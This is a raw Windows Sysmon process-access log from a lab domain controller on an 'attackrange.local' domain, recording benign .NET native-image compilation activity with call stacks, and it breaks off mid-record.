10341000x80000000000000007920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.588{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9C03-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.588{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9C03-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.510{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9B03-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.494{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9B03-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.494{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9B03-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9A03-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.338{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9A03-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.338{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9A03-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9903-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9903-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9903-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9803-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.213{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9803-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.213{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9803-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.150{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9703-00000000A301}4740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.150{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9703-00000000A301}4740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.135{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9703-00000000A301}4740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.041{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9603-00000000A301}4780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.025{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9603-00000000A301}4780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.025{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9603-00000000A301}4780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.619{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.619{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.619{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 